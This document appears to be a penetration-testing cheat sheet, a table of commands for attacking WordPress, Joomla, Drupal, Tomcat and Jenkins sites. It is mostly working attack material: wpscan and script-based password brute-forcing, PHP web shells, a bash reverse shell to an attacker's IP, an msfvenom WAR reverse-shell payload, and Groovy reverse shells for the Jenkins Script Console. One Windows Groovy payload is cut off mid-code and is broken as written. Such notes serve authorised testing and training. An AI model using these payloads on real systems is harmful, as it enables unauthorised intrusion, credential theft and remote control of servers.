# Common Applications

| Command | Description |
| ------- | ----------- |
| `sudo vim /etc/hosts` | Opens `/etc/hosts` in `vim` to start adding hostnames |
| `sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list` | Runs an nmap scan of common web application ports against the hosts in a scope list (`scope_list`) and writes the output to a file (`web_discovery`) in all formats (`-oA`) |
| `eyewitness --web -x web_discovery.xml -d <nameofdirectorytobecreated>` | Runs `eyewitness` on the XML output of the nmap scan (`web_discovery.xml`) and stores the results in a newly created directory (`-d`) |
| `cat web_discovery.xml \| ./aquatone -nmap` | Pipes the XML output of the nmap scan (`web_discovery.xml`) to aquatone (`./aquatone`), with `-nmap` telling aquatone to parse the input as nmap scan output |
| `sudo wpscan --url <http://domainnameoripaddress> --enumerate` | Runs wpscan with the `--enumerate` flag. The URL can be replaced with any valid and reachable URL in each challenge |
| `sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url <http://domainnameoripaddress>` | Runs wpscan to perform a password attack (`--password-attack`) against the specified URL using a wordlist (`/usr/share/wordlists/rockyou.txt`) |
| `curl -s http://<hostnameoripoftargetsite>/path/to/webshell.php?cmd=id` | cURL command used to execute commands (`cmd=id`) on a vulnerable system through a PHP-based web shell |
| `<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip address of attack box>/<port of choice> 0>&1'");` | PHP code that executes a reverse shell on a Linux-based system |
| `droopescan scan joomla --url http://<domainnameoripaddress>` | Runs `droopescan` against a Joomla site located at the specified URL |
| `sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr <username or path to username list>` | Runs the joomla-brute.py tool with python3 against the specified URL, using a wordlist (`/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt`) and a username or list of usernames (`-usr`) |
| `<?php system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); ?>` | PHP code that provides web shell access on a vulnerable Drupal site. Can be used by browsing to the location of the saved file in the web directory, or through curl (see next command) |
| `curl -s <http://domainname or IP address of site>/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id \| grep uid \| cut -f4 -d">"` | Uses curl to request the PHP web shell file and run system commands (`=id`) on the target |
| `gobuster dir -u <http://domainnameoripaddressofsite> -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt` | `gobuster`-powered directory brute-forcing attack referencing a wordlist (`/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt`) |
| `auxiliary/scanner/http/tomcat_mgr_login` | Metasploit scanner module used to perform a brute-force login attack against a Tomcat site |
| `python3 mgr_brute.py -U <http://domainnameoripaddressofTomCatsite> -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt` | Runs mgr_brute.py with python3 against the specified website, starting in the `/manager` directory (`-P /manager`) and referencing a specified user or user list (`-u`) as well as a specified password or password list (`-p`) |
| `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip address of attack box> LPORT=<port to listen on to catch a shell> -f war > backup.war` | Generates a JSP-based reverse shell payload in the form of a `.war` file using `msfvenom` |
| `nmap -sV -p 8009,8080 <domainname or IP address of tomcat site>` | Nmap scan useful for enumerating Apache Tomcat and AJP services |
| `r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 \| while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()` | Groovy-based reverse shell payload that works with admin access to the `Script Console` of a `Jenkins` site when the underlying OS is Linux |
| `def cmd = "cmd.exe /c dir".execute(); println("${cmd.text}");` | Groovy-based payload that works with admin access to the `Script Console` of a `Jenkins` site. Provides web shell-style command execution on the underlying Windows system |
| `String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new So);` | Groovy-based reverse shell payload that works with admin access to the `Script Console` of a `Jenkins` site when the underlying OS is Windows |
| [reverse\_shell\_splunk](https://github.com/0xjpuff/reverse_shell_splunk) | A simple Splunk package for obtaining reverse shells on Windows and Linux systems |
